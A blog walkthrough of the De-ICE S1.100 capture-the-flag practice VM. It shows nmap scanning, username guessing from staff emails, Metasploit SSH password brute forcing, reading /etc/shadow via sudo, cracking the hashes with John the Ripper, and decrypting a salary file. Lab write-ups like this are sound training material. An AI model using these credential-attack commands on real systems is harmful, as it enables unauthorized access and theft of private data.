De-ICE S1.100 Walkthrough

While digging though an old external drive I found the De-ICE LiveCD’s and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. The De-ICE S1.100 was the first capture the flag type challenge that I ever did. I think I got it from a 2600 Magazine, so it holds a special place in my heart. I would have actually done this initially using BackTrack or PHLAK; PHALK still has the best Tux logo of any distro, RIP PHALK. I lost my original notes so this one is brand new, instead of a few years old like the other versions will be. Have fun and hopefully these are helpful.

SE-ICE S1.100

Scenario: The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities. To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information. The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso

Default IP 192.168.1.100

Flags:
1. Create list of open ports
2. Create a list of possible user names
3. Gain access to the file system
4. Elevate to root privileges
5. Discover root password
6. Find sensitive data on the operating system

Spoilers and Walkthrough

I usually start all assessments out with a port scan. This gives me at least an idea of where to start on a black box test. Since I am running this in a local VMWare environment speed isn’t an issue so -T5 it is. I also what to do OS detection and service enumeration so I’m using -A.

nmap -A -p 0-65535 -T5 192.168.1.100
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-05 20:59 EDT
Nmap scan report for caps-dh841pm1(192.168.1.100)
Host is up (0.00025s latency).
Not shown: 65528 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey: 
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.1.128], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP, 
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: UNSELECT LOGIN-REFERRALS MAILBOX-REFERRALS LITERAL+ THREAD=REFERENCES NAMESPACE completed IDLE SASL-IR CAPABILITY OK AUTH=LOGINA0001 BINARY IMAP4REV1 STARTTLS MULTIAPPEND SCAN THREAD=ORDEREDSUBJECT SORT
443/tcp closed https
MAC Address: 00:0C:29:1F:C6:F0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Hosts: slax.example.net, isr-l2g99xz1; OS: Unix

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

To start out I always by looking for low hanging fruit. Since the FTP service looks to be broken, based on the Nmap scan results we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Marymarym@herot.net
Pat Patrickpatrickp@herot.net
Terry Thompsonthompsont@herot.net
Ben Benedictbenedictb@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Erin Gennieggenniege@herot.net
Paul Michaelmichaelp@herot.net
Ester Longlonge@herot.net
Adam Adamsadamsa@herot.net
Bob Banterbanterb@herot.net
Chad Coffeecoffeec@herot.net

This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last>, <first initial><last>. I’ve also had <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I’ll use metasploit to do the initial check for weak SSH passwords. You can set your options differently this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true

Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was a unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now so lets see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet since in Linux and Unix systems it allows users to run the su command. aadams is a member of the wheel group so we will try to brute force that password, again using metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can directly attach shadow files so lets try it using the rockyou wordlist. The first one runs a simple set of rules to look for easy passwords, basically so you don’t have to find bbanter again.

john --signle deiceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -

Now that we are root on the system lets look for sensitive data on the system.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc, google that I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling the Salted__n and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption and second after some research we know that it is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10

That is certainly sensitive data! We’ve got all the flag, time to call it a day.

 

Leave a Reply